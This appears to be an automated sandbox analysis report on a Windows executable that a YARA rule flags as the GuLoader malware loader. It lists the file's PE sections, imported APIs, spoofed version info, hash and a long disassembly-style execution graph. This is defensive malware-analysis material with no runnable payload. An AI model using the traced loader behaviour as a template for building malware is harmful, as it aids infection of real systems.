                      .ndata | 0x3a9000 | 0x2d000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc | 0x3d6000 | 0x15908 | 0x15a00 | False | 0.471132135116 | data | 5.8124427271 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country
                      RT_ICON | 0x3d62c8 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
                      RT_ICON | 0x3e6af0 | 0x25a8 | data | English | United States
                      RT_ICON | 0x3e9098 | 0x10a8 | data | English | United States
                      RT_ICON | 0x3ea140 | 0x988 | data | English | United States
                      RT_ICON | 0x3eaac8 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                      RT_DIALOG | 0x3eaf30 | 0x100 | data | English | United States
                      RT_DIALOG | 0x3eb030 | 0x11c | data | English | United States
                      RT_DIALOG | 0x3eb150 | 0xc4 | data | English | United States
                      RT_DIALOG | 0x3eb218 | 0x60 | data | English | United States
                      RT_GROUP_ICON | 0x3eb278 | 0x4c | data | English | United States
                      RT_VERSION | 0x3eb2c8 | 0x300 | data | English | United States
                      RT_MANIFEST | 0x3eb5c8 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                      DLL | Import
                      ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                      SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                      Description | Data
                      LegalCopyright | Avnet, Inc.
                      FileVersion | 24.30.26
                      CompanyName | Stewart Information Services Corp
                      LegalTrademarks | PacifiCare Health Systems Inc
                      Comments | Reliance Steel & Aluminum Co.
                      ProductName | Mariner Health Care Inc.
                      FileDescription | Disc Soft Ltd
                      Translation | 0x0409 0x04b0
                      Language of compilation system | Country where language is spoken | Map
                      English | United States |
                      No network behavior found

                      Target ID:1
                      Start time:10:31:53
                      Start date:12/05/2022
                      Path:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\aSsc9zh1ex.exe"
                      Imagebase:0x400000
                      File size:326847 bytes
                      MD5 hash:D5E55A57372BCAD45FBB260105179CAF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                        Execution Graph

                        Execution Coverage:16.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16%
                        Total number of Nodes:1577
                        Total number of Limit Nodes:30
SendMessageW 5156->5168 5164 4053a2 5157->5164 5172 40538c SendMessageW 5157->5172 5177 4044ab SendMessageW 5158->5177 5176 4044ab SendMessageW 5159->5176 5160->5129 5160->5140 5161->5156 5162->5134 5163->5152 5163->5155 5170 405468 5164->5170 5175 405416 SendMessageW SendMessageW 5164->5175 5167->5156 5168->5156 5171 405473 InvalidateRect 5170->5171 5173 40547f 5170->5173 5171->5173 5172->5164 5173->5149 5192 404dec 5173->5192 5175->5164 5176->5139 5177->5131 5179 404e90 SendMessageW 5178->5179 5180 404e54 GetMessagePos ScreenToClient SendMessageW 5178->5180 5181 404e88 5179->5181 5180->5181 5182 404e8d 5180->5182 5181->5160 5182->5179 5195 40651a lstrcpynW 5183->5195 5185 404ec4 5196 406461 wsprintfW 5185->5196 5187 404ece 5188 40140b 2 API calls 5187->5188 5189 404ed7 5188->5189 5197 40651a lstrcpynW 5189->5197 5191 404ede 5191->5157 5198 404d23 5192->5198 5194 404e01 5194->5149 5195->5185 5196->5187 5197->5191 5199 404d3c 5198->5199 5200 406557 17 API calls 5199->5200 5201 404da0 5200->5201 5202 406557 17 API calls 5201->5202 5203 404dab 5202->5203 5204 406557 17 API calls 5203->5204 5205 404dc1 lstrlenW wsprintfW SetDlgItemTextW 5204->5205 5205->5194 5206 401563 5207 402ba4 5206->5207 5210 406461 wsprintfW 5207->5210 5209 402ba9 5210->5209 5211 4045e6 lstrlenW 5212 404605 5211->5212 5213 404607 WideCharToMultiByte 5211->5213 5212->5213 5214 404967 5215 404993 5214->5215 5216 4049a4 5214->5216 5275 405b5e GetDlgItemTextW 5215->5275 5217 4049b0 GetDlgItem 5216->5217 5220 404a0f 5216->5220 5219 4049c4 5217->5219 5224 4049d8 SetWindowTextW 5219->5224 5227 405e94 4 API calls 5219->5227 5221 404af3 5220->5221 5229 406557 17 API calls 5220->5229 5273 404ca2 5220->5273 5221->5273 5277 405b5e GetDlgItemTextW 5221->5277 5222 40499e 5223 4067a1 5 API calls 5222->5223 5223->5216 5228 404476 18 API calls 5224->5228 5226 4044dd 8 API calls 5231 404cb6 5226->5231 5232 4049ce 5227->5232 5233 4049f4 5228->5233 5234 404a83 SHBrowseForFolderW 5229->5234 5230 404b23 5235 405ef1 
18 API calls 5230->5235 5232->5224 5239 405de9 3 API calls 5232->5239 5236 404476 18 API calls 5233->5236 5234->5221 5237 404a9b CoTaskMemFree 5234->5237 5238 404b29 5235->5238 5240 404a02 5236->5240 5241 405de9 3 API calls 5237->5241 5278 40651a lstrcpynW 5238->5278 5239->5224 5276 4044ab SendMessageW 5240->5276 5248 404aa8 5241->5248 5244 404a08 5247 4068e7 5 API calls 5244->5247 5245 404adf SetDlgItemTextW 5245->5221 5246 404b40 5249 4068e7 5 API calls 5246->5249 5247->5220 5248->5245 5250 406557 17 API calls 5248->5250 5257 404b47 5249->5257 5251 404ac7 lstrcmpiW 5250->5251 5251->5245 5253 404ad8 lstrcatW 5251->5253 5252 404b88 5279 40651a lstrcpynW 5252->5279 5253->5245 5255 404b8f 5256 405e94 4 API calls 5255->5256 5258 404b95 GetDiskFreeSpaceW 5256->5258 5257->5252 5261 405e35 2 API calls 5257->5261 5262 404be0 5257->5262 5260 404bb9 MulDiv 5258->5260 5258->5262 5260->5262 5261->5257 5263 404c51 5262->5263 5264 404dec 20 API calls 5262->5264 5265 404c74 5263->5265 5267 40140b 2 API calls 5263->5267 5266 404c3e 5264->5266 5280 404498 KiUserCallbackDispatcher 5265->5280 5268 404c53 SetDlgItemTextW 5266->5268 5269 404c43 5266->5269 5267->5265 5268->5263 5271 404d23 20 API calls 5269->5271 5271->5263 5272 404c90 5272->5273 5281 4048c0 5272->5281 5273->5226 5275->5222 5276->5244 5277->5230 5278->5246 5279->5255 5280->5272 5282 4048d3 SendMessageW 5281->5282 5283 4048ce 5281->5283 5282->5273 5283->5282 5284 401968 5285 402d84 17 API calls 5284->5285 5286 40196f 5285->5286 5287 402d84 17 API calls 5286->5287 5288 40197c 5287->5288 5289 402da6 17 API calls 5288->5289 5290 401993 lstrlenW 5289->5290 5292 4019a4 5290->5292 5291 4019e5 5292->5291 5296 40651a lstrcpynW 5292->5296 5294 4019d5 5294->5291 5295 4019da lstrlenW 5294->5295 5295->5291 5296->5294 5297 40166a 5298 402da6 17 API calls 5297->5298 5299 401670 5298->5299 5300 406850 2 API calls 5299->5300 5301 401676 5300->5301 5302 402aeb 5303 402d84 17 API calls 5302->5303 5304 402af1 5303->5304 5305 406557 17 API 
calls 5304->5305 5306 40292e 5304->5306 5305->5306 5307 4026ec 5308 402d84 17 API calls 5307->5308 5310 4026fb 5308->5310 5309 402838 5310->5309 5311 402745 ReadFile 5310->5311 5312 40608d ReadFile 5310->5312 5314 402785 MultiByteToWideChar 5310->5314 5315 40283a 5310->5315 5317 4027ab SetFilePointer MultiByteToWideChar 5310->5317 5318 40284b 5310->5318 5320 4060eb SetFilePointer 5310->5320 5311->5309 5311->5310 5312->5310 5314->5310 5329 406461 wsprintfW 5315->5329 5317->5310 5318->5309 5319 40286c SetFilePointer 5318->5319 5319->5309 5321 406107 5320->5321 5328 40611f 5320->5328 5322 40608d ReadFile 5321->5322 5323 406113 5322->5323 5324 406150 SetFilePointer 5323->5324 5325 406128 SetFilePointer 5323->5325 5323->5328 5324->5328 5325->5324 5326 406133 5325->5326 5327 4060bc WriteFile 5326->5327 5327->5328 5328->5310 5329->5309 5330 732d1000 5331 732d101b 5 API calls 5330->5331 5332 732d1019 5331->5332 4935 40176f 4936 402da6 17 API calls 4935->4936 4937 401776 4936->4937 4938 401796 4937->4938 4939 40179e 4937->4939 4974 40651a lstrcpynW 4938->4974 4975 40651a lstrcpynW 4939->4975 4942 40179c 4946 4067a1 5 API calls 4942->4946 4943 4017a9 4944 405de9 3 API calls 4943->4944 4945 4017af lstrcatW 4944->4945 4945->4942 4948 4017bb 4946->4948 4947 406850 2 API calls 4947->4948 4948->4947 4949 405fe5 2 API calls 4948->4949 4951 4017cd CompareFileTime 4948->4951 4952 40188d 4948->4952 4953 401864 4948->4953 4956 40651a lstrcpynW 4948->4956 4962 406557 17 API calls 4948->4962 4969 405b7a MessageBoxIndirectW 4948->4969 4973 40600a GetFileAttributesW CreateFileW 4948->4973 4949->4948 4951->4948 4954 40557c 24 API calls 4952->4954 4955 40557c 24 API calls 4953->4955 4963 401879 4953->4963 4957 401897 4954->4957 4955->4963 4956->4948 4958 4032b4 31 API calls 4957->4958 4959 4018aa 4958->4959 4960 4018be SetFileTime 4959->4960 4961 4018d0 FindCloseChangeNotification 4959->4961 4960->4961 4961->4963 4964 4018e1 4961->4964 4962->4948 4965 4018e6 4964->4965 4966 4018f9 
4964->4966 4967 406557 17 API calls 4965->4967 4968 406557 17 API calls 4966->4968 4970 4018ee lstrcatW 4967->4970 4971 401901 4968->4971 4969->4948 4970->4971 4971->4963 4972 405b7a MessageBoxIndirectW 4971->4972 4972->4963 4973->4948 4974->4942 4975->4943 5333 4054f0 5334 405500 5333->5334 5335 405514 5333->5335 5336 405506 5334->5336 5345 40555d 5334->5345 5337 40551c IsWindowVisible 5335->5337 5343 405533 5335->5343 5339 4044c2 SendMessageW 5336->5339 5340 405529 5337->5340 5337->5345 5338 405562 CallWindowProcW 5341 405510 5338->5341 5339->5341 5342 404e31 5 API calls 5340->5342 5342->5343 5343->5338 5344 404eb1 4 API calls 5343->5344 5344->5345 5345->5338 5346 401a72 5347 402d84 17 API calls 5346->5347 5348 401a7b 5347->5348 5349 402d84 17 API calls 5348->5349 5350 401a20 5349->5350 5351 401573 5352 401583 ShowWindow 5351->5352 5353 40158c 5351->5353 5352->5353 5354 402c2a 5353->5354 5355 40159a ShowWindow 5353->5355 5355->5354 5356 4023f4 5357 402da6 17 API calls 5356->5357 5358 402403 5357->5358 5359 402da6 17 API calls 5358->5359 5360 40240c 5359->5360 5361 402da6 17 API calls 5360->5361 5362 402416 GetPrivateProfileStringW 5361->5362 5363 4014f5 SetForegroundWindow 5364 402c2a 5363->5364 5365 401ff6 5366 402da6 17 API calls 5365->5366 5367 401ffd 5366->5367 5368 406850 2 API calls 5367->5368 5369 402003 5368->5369 5371 402014 5369->5371 5372 406461 wsprintfW 5369->5372 5372->5371 4300 403f77 4301 4040f0 4300->4301 4302 403f8f 4300->4302 4304 404101 GetDlgItem GetDlgItem 4301->4304 4305 404141 4301->4305 4302->4301 4303 403f9b 4302->4303 4308 403fa6 SetWindowPos 4303->4308 4309 403fb9 4303->4309 4373 404476 4304->4373 4307 40419b 4305->4307 4317 401389 2 API calls 4305->4317 4328 4040eb 4307->4328 4379 4044c2 4307->4379 4308->4309 4312 403fc2 ShowWindow 4309->4312 4313 404004 4309->4313 4310 40412b KiUserCallbackDispatcher 4376 40140b 4310->4376 4318 403fe2 GetWindowLongW 4312->4318 4319 4040dd 4312->4319 4315 404023 4313->4315 4316 40400c DestroyWindow 
4313->4316 4321 404028 SetWindowLongW 4315->4321 4322 404039 4315->4322 4372 4043ff 4316->4372 4323 404173 4317->4323 4318->4319 4320 403ffb ShowWindow 4318->4320 4395 4044dd 4319->4395 4320->4313 4321->4328 4322->4319 4326 404045 GetDlgItem 4322->4326 4323->4307 4327 404177 SendMessageW 4323->4327 4325 404401 DestroyWindow EndDialog 4325->4372 4331 404073 4326->4331 4332 404056 SendMessageW IsWindowEnabled 4326->4332 4327->4328 4329 40140b 2 API calls 4345 4041ad 4329->4345 4330 404430 ShowWindow 4330->4328 4334 404078 4331->4334 4335 404080 4331->4335 4337 4040c7 SendMessageW 4331->4337 4338 404093 4331->4338 4332->4328 4332->4331 4333 406557 17 API calls 4333->4345 4392 40444f 4334->4392 4335->4334 4335->4337 4337->4319 4340 4040b0 4338->4340 4341 40409b 4338->4341 4339 4040ae 4339->4319 4344 40140b 2 API calls 4340->4344 4342 40140b 2 API calls 4341->4342 4342->4334 4343 404476 18 API calls 4343->4345 4346 4040b7 4344->4346 4345->4325 4345->4328 4345->4329 4345->4333 4345->4343 4347 404476 18 API calls 4345->4347 4363 404341 DestroyWindow 4345->4363 4346->4319 4346->4334 4348 404228 GetDlgItem 4347->4348 4349 404245 ShowWindow KiUserCallbackDispatcher 4348->4349 4350 40423d 4348->4350 4382 404498 KiUserCallbackDispatcher 4349->4382 4350->4349 4352 40426f EnableWindow 4357 404283 4352->4357 4353 404288 GetSystemMenu EnableMenuItem SendMessageW 4354 4042b8 SendMessageW 4353->4354 4353->4357 4354->4357 4357->4353 4383 4044ab SendMessageW 4357->4383 4384 403f58 4357->4384 4387 40651a lstrcpynW 4357->4387 4359 4042e7 lstrlenW 4360 406557 17 API calls 4359->4360 4361 4042fd SetWindowTextW 4360->4361 4388 401389 4361->4388 4364 40435b CreateDialogParamW 4363->4364 4363->4372 4365 40438e 4364->4365 4364->4372 4366 404476 18 API calls 4365->4366 4367 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4366->4367 4368 401389 2 API calls 4367->4368 4369 4043df 4368->4369 4369->4328 4370 4043e7 ShowWindow 4369->4370 4371 4044c2 SendMessageW 4370->4371 4371->4372 
4372->4328 4372->4330 4374 406557 17 API calls 4373->4374 4375 404481 SetDlgItemTextW 4374->4375 4375->4310 4377 401389 2 API calls 4376->4377 4378 401420 4377->4378 4378->4305 4380 4044da 4379->4380 4381 4044cb SendMessageW 4379->4381 4380->4345 4381->4380 4382->4352 4383->4357 4385 406557 17 API calls 4384->4385 4386 403f66 SetWindowTextW 4385->4386 4386->4357 4387->4359 4390 401390 4388->4390 4389 4013fe 4389->4345 4390->4389 4391 4013cb MulDiv SendMessageW 4390->4391 4391->4390 4393 404456 4392->4393 4394 40445c SendMessageW 4392->4394 4393->4394 4394->4339 4396 4044f5 GetWindowLongW 4395->4396 4405 4045a0 4395->4405 4397 40450a 4396->4397 4396->4405 4398 404537 GetSysColor 4397->4398 4399 40453a 4397->4399 4397->4405 4398->4399 4400 404540 SetTextColor 4399->4400 4401 40454a SetBkMode 4399->4401 4400->4401 4402 404562 GetSysColor 4401->4402 4403 404568 4401->4403 4402->4403 4404 40456f SetBkColor 4403->4404 4406 404579 4403->4406 4404->4406 4405->4328 4406->4405 4407 404593 CreateBrushIndirect 4406->4407 4408 40458c DeleteObject 4406->4408 4407->4405 4408->4407 5373 401b77 5374 402da6 17 API calls 5373->5374 5375 401b7e 5374->5375 5376 402d84 17 API calls 5375->5376 5377 401b87 wsprintfW 5376->5377 5378 402c2a 5377->5378 5379 40167b 5380 402da6 17 API calls 5379->5380 5381 401682 5380->5381 5382 402da6 17 API calls 5381->5382 5383 40168b 5382->5383 5384 402da6 17 API calls 5383->5384 5385 401694 MoveFileW 5384->5385 5386 4016a7 5385->5386 5392 4016a0 5385->5392 5387 406850 2 API calls 5386->5387 5388 4022f6 5386->5388 5390 4016b6 5387->5390 5389 401423 24 API calls 5389->5388 5390->5388 5391 4062da 36 API calls 5390->5391 5391->5392 5392->5389 5393 4022ff 5394 402da6 17 API calls 5393->5394 5395 402305 5394->5395 5396 402da6 17 API calls 5395->5396 5397 40230e 5396->5397 5398 402da6 17 API calls 5397->5398 5399 402317 5398->5399 5400 406850 2 API calls 5399->5400 5401 402320 5400->5401 5402 402331 lstrlenW lstrlenW 5401->5402 5406 402324 5401->5406 5403 40557c 
24 API calls 5402->5403 5405 40236f SHFileOperationW 5403->5405 5404 40557c 24 API calls 5407 40232c 5404->5407 5405->5406 5405->5407 5406->5404 5406->5407 5408 4019ff 5409 402da6 17 API calls 5408->5409 5410 401a06 5409->5410 5411 402da6 17 API calls 5410->5411 5412 401a0f 5411->5412 5413 401a16 lstrcmpiW 5412->5413 5414 401a28 lstrcmpW 5412->5414 5415 401a1c 5413->5415 5414->5415 5416 401000 5417 401037 BeginPaint GetClientRect 5416->5417 5418 40100c DefWindowProcW 5416->5418 5420 4010f3 5417->5420 5421 401179 5418->5421 5422 401073 CreateBrushIndirect FillRect DeleteObject 5420->5422 5423 4010fc 5420->5423 5422->5420 5424 401102 CreateFontIndirectW 5423->5424 5425 401167 EndPaint 5423->5425 5424->5425 5426 401112 6 API calls 5424->5426 5425->5421 5426->5425 5427 401d81 5428 401d94 GetDlgItem 5427->5428 5429 401d87 5427->5429 5432 401d8e 5428->5432 5430 402d84 17 API calls 5429->5430 5430->5432 5431 401dd5 GetClientRect LoadImageW SendMessageW 5435 401e33 5431->5435 5437 401e3f 5431->5437 5432->5431 5433 402da6 17 API calls 5432->5433 5433->5431 5436 401e38 DeleteObject 5435->5436 5435->5437 5436->5437 5438 401503 5439 40150b 5438->5439 5441 40151e 5438->5441 5440 402d84 17 API calls 5439->5440 5440->5441 5442 402383 5443 40238a 5442->5443 5446 40239d 5442->5446 5444 406557 17 API calls 5443->5444 5445 402397 5444->5445 5445->5446 5447 405b7a MessageBoxIndirectW 5445->5447 5447->5446 5448 732d23e9 5449 732d2453 5448->5449 5450 732d245e GlobalAlloc 5449->5450 5451 732d247d 5449->5451 5450->5449 5452 402c05 SendMessageW 5453 402c2a 5452->5453 5454 402c1f InvalidateRect 5452->5454 5454->5453 5455 403b87 5456 403b92 5455->5456 5457 403b96 5456->5457 5458 403b99 GlobalAlloc 5456->5458 5458->5457 4595 40350a SetErrorMode GetVersionExW 4596 403594 4595->4596 4597 40355c GetVersionExW 4595->4597 4598 4035ed 4596->4598 4599 4068e7 5 API calls 4596->4599 4597->4596 4600 406877 3 API calls 4598->4600 4599->4598 4601 403603 lstrlenA 4600->4601 4601->4598 4602 403613 
4601->4602 4603 4068e7 5 API calls 4602->4603 4604 40361a 4603->4604 4605 4068e7 5 API calls 4604->4605 4606 403621 4605->4606 4607 4068e7 5 API calls 4606->4607 4608 40362d #17 OleInitialize SHGetFileInfoW 4607->4608 4686 40651a lstrcpynW 4608->4686 4611 40367a GetCommandLineW 4687 40651a lstrcpynW 4611->4687 4613 40368c 4614 405e16 CharNextW 4613->4614 4615 4036b2 CharNextW 4614->4615 4626 4036c3 4615->4626 4616 4037c1 4617 4037d5 GetTempPathW 4616->4617 4688 4034d9 4617->4688 4619 4037ed 4621 4037f1 GetWindowsDirectoryW lstrcatW 4619->4621 4622 403847 DeleteFileW 4619->4622 4620 405e16 CharNextW 4620->4626 4624 4034d9 12 API calls 4621->4624 4698 40307d GetTickCount GetModuleFileNameW 4622->4698 4627 40380d 4624->4627 4625 40385a 4629 40391e 4625->4629 4632 40390f 4625->4632 4636 405e16 CharNextW 4625->4636 4626->4616 4626->4620 4628 4037c3 4626->4628 4627->4622 4630 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4627->4630 4782 40651a lstrcpynW 4628->4782 4790 403aef 4629->4790 4631 4034d9 12 API calls 4630->4631 4635 40383f 4631->4635 4726 403bc9 4632->4726 4635->4622 4635->4629 4652 40387c 4636->4652 4639 403a46 4797 405b7a 4639->4797 4640 403a5b 4641 403a63 GetCurrentProcess OpenProcessToken 4640->4641 4642 403ad9 ExitProcess 4640->4642 4645 403aa9 4641->4645 4646 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 4641->4646 4651 4068e7 5 API calls 4645->4651 4646->4645 4648 4038e5 4650 405ef1 18 API calls 4648->4650 4649 403926 4653 405ae5 5 API calls 4649->4653 4654 4038f1 4650->4654 4655 403ab0 4651->4655 4652->4648 4652->4649 4656 40392b lstrcatW 4653->4656 4654->4629 4783 40651a lstrcpynW 4654->4783 4657 403ac5 ExitWindowsEx 4655->4657 4661 403ad2 4655->4661 4658 403947 lstrcatW lstrcmpiW 4656->4658 4659 40393c lstrcatW 4656->4659 4657->4642 4657->4661 4658->4629 4662 403967 4658->4662 4659->4658 4666 40140b 2 API calls 4661->4666 4663 403973 4662->4663 4664 40396c 4662->4664 4668 405ac8 2 API calls 4663->4668 4667 405a4b 4 
API calls 4664->4667 4665 403904 4784 40651a lstrcpynW 4665->4784 4666->4642 4670 403971 4667->4670 4671 403978 SetCurrentDirectoryW 4668->4671 4670->4671 4672 403995 4671->4672 4673 40398a 4671->4673 4786 40651a lstrcpynW 4672->4786 4785 40651a lstrcpynW 4673->4785 4676 406557 17 API calls 4677 4039d7 DeleteFileW 4676->4677 4678 4039e3 CopyFileW 4677->4678 4683 4039a2 4677->4683 4678->4683 4679 403a2d 4681 4062da 36 API calls 4679->4681 4680 4062da 36 API calls 4680->4683 4681->4629 4682 406557 17 API calls 4682->4683 4683->4676 4683->4679 4683->4680 4683->4682 4685 403a17 CloseHandle 4683->4685 4787 405afd CreateProcessW 4683->4787 4685->4683 4686->4611 4687->4613 4689 4067a1 5 API calls 4688->4689 4690 4034e5 4689->4690 4691 4034ef 4690->4691 4692 405de9 3 API calls 4690->4692 4691->4619 4693 4034f7 4692->4693 4694 405ac8 2 API calls 4693->4694 4695 4034fd 4694->4695 4801 406039 4695->4801 4805 40600a GetFileAttributesW CreateFileW 4698->4805 4700 4030bd 4720 4030cd 4700->4720 4806 40651a lstrcpynW 4700->4806 4702 4030e3 4703 405e35 2 API calls 4702->4703 4704 4030e9 4703->4704 4807 40651a lstrcpynW 4704->4807 4706 4030f4 GetFileSize 4707 4031ee 4706->4707 4725 40310b 4706->4725 4808 403019 4707->4808 4709 4031f7 4711 403227 GlobalAlloc 4709->4711 4709->4720 4843 4034c2 SetFilePointer 4709->4843 4819 4034c2 SetFilePointer 4711->4819 4712 40325a 4717 403019 6 API calls 4712->4717 4715 403210 4718 4034ac ReadFile 4715->4718 4716 403242 4820 4032b4 4716->4820 4717->4720 4721 40321b 4718->4721 4720->4625 4721->4711 4721->4720 4722 403019 6 API calls 4722->4725 4723 40324e 4723->4720 4723->4723 4724 40328b SetFilePointer 4723->4724 4724->4720 4725->4707 4725->4712 4725->4720 4725->4722 4840 4034ac 4725->4840 4727 4068e7 5 API calls 4726->4727 4728 403bdd 4727->4728 4729 403be3 4728->4729 4730 403bf5 4728->4730 4864 406461 wsprintfW 4729->4864 4731 4063e8 3 API calls 4730->4731 4732 403c25 4731->4732 4734 403c44 lstrcatW 4732->4734 4736 4063e8 3 API calls 4732->4736 
4735 403bf3 4734->4735 4849 403e9f 4735->4849 4736->4734 4739 405ef1 18 API calls 4740 403c76 4739->4740 4741 403d0a 4740->4741 4744 4063e8 3 API calls 4740->4744 4742 405ef1 18 API calls 4741->4742 4743 403d10 4742->4743 4746 403d20 LoadImageW 4743->4746 4747 406557 17 API calls 4743->4747 4745 403ca8 4744->4745 4745->4741 4750 403cc9 lstrlenW 4745->4750 4754 405e16 CharNextW 4745->4754 4748 403dc6 4746->4748 4749 403d47 RegisterClassW 4746->4749 4747->4746 4753 40140b 2 API calls 4748->4753 4751 403dd0 4749->4751 4752 403d7d SystemParametersInfoW CreateWindowExW 4749->4752 4755 403cd7 lstrcmpiW 4750->4755 4756 403cfd 4750->4756 4751->4629 4752->4748 4757 403dcc 4753->4757 4758 403cc6 4754->4758 4755->4756 4759 403ce7 GetFileAttributesW 4755->4759 4760 405de9 3 API calls 4756->4760 4757->4751 4762 403e9f 18 API calls 4757->4762 4758->4750 4761 403cf3 4759->4761 4763 403d03 4760->4763 4761->4756 4764 405e35 2 API calls 4761->4764 4765 403ddd 4762->4765 4865 40651a lstrcpynW 4763->4865 4764->4756 4767 403de9 ShowWindow 4765->4767 4768 403e6c 4765->4768 4770 406877 3 API calls 4767->4770 4857 40564f OleInitialize 4768->4857 4771 403e01 4770->4771 4773 403e0f GetClassInfoW 4771->4773 4776 406877 3 API calls 4771->4776 4772 403e72 4774 403e76 4772->4774 4775 403e8e 4772->4775 4778 403e23 GetClassInfoW RegisterClassW 4773->4778 4779 403e39 DialogBoxParamW 4773->4779 4774->4751 4781 40140b 2 API calls 4774->4781 4777 40140b 2 API calls 4775->4777 4776->4773 4777->4751 4778->4779 4780 40140b 2 API calls 4779->4780 4780->4751 4781->4751 4782->4617 4783->4665 4784->4632 4785->4672 4786->4683 4788 405b30 CloseHandle 4787->4788 4789 405b3c 4787->4789 4788->4789 4789->4683 4791 403b07 4790->4791 4792 403af9 CloseHandle 4790->4792 4867 403b34 4791->4867 4792->4791 4795 405c26 67 API calls 4796 403a3b OleUninitialize 4795->4796 4796->4639 4796->4640 4798 405b8f 4797->4798 4799 403a53 ExitProcess 4798->4799 4800 405ba3 MessageBoxIndirectW 4798->4800 4800->4799 4802 406046 
GetTickCount GetTempFileNameW 4801->4802 4803 403508 4802->4803 4804 40607c 4802->4804 4803->4619 4804->4802 4804->4803 4805->4700 4806->4702 4807->4706 4809 403022 4808->4809 4810 40303a 4808->4810 4813 403032 4809->4813 4814 40302b DestroyWindow 4809->4814 4811 403042 4810->4811 4812 40304a GetTickCount 4810->4812 4844 406923 4811->4844 4816 403058 CreateDialogParamW ShowWindow 4812->4816 4817 40307b 4812->4817 4813->4709 4814->4813 4816->4817 4817->4709 4819->4716 4821 4032cd 4820->4821 4822 4032fb 4821->4822 4848 4034c2 SetFilePointer 4821->4848 4824 4034ac ReadFile 4822->4824 4825 403306 4824->4825 4826 40342f 4825->4826 4827 403445 4825->4827 4828 403318 GetTickCount 4825->4828 4826->4723 4829 403487 4827->4829 4832 403449 4827->4832 4828->4826 4833 403344 4828->4833 4831 4034ac ReadFile 4829->4831 4830 4034ac ReadFile 4830->4833 4831->4826 4832->4826 4834 4034ac ReadFile 4832->4834 4835 4060bc WriteFile 4832->4835 4833->4826 4833->4830 4836 40339a GetTickCount 4833->4836 4837 4033bf MulDiv wsprintfW 4833->4837 4839 4060bc WriteFile 4833->4839 4834->4832 4835->4832 4836->4833 4838 40557c 24 API calls 4837->4838 4838->4833 4839->4833 4841 40608d ReadFile 4840->4841 4842 4034bf 4841->4842 4842->4725 4843->4715 4845 406940 PeekMessageW 4844->4845 4846 403048 4845->4846 4847 406936 DispatchMessageW 4845->4847 4846->4709 4847->4845 4848->4822 4850 403eb3 4849->4850 4866 406461 wsprintfW 4850->4866 4852 403f24 4853 403f58 18 API calls 4852->4853 4855 403f29 4853->4855 4854 403c54 4854->4739 4855->4854 4856 406557 17 API calls 4855->4856 4856->4855 4858 4044c2 SendMessageW 4857->4858 4859 405672 4858->4859 4862 401389 2 API calls 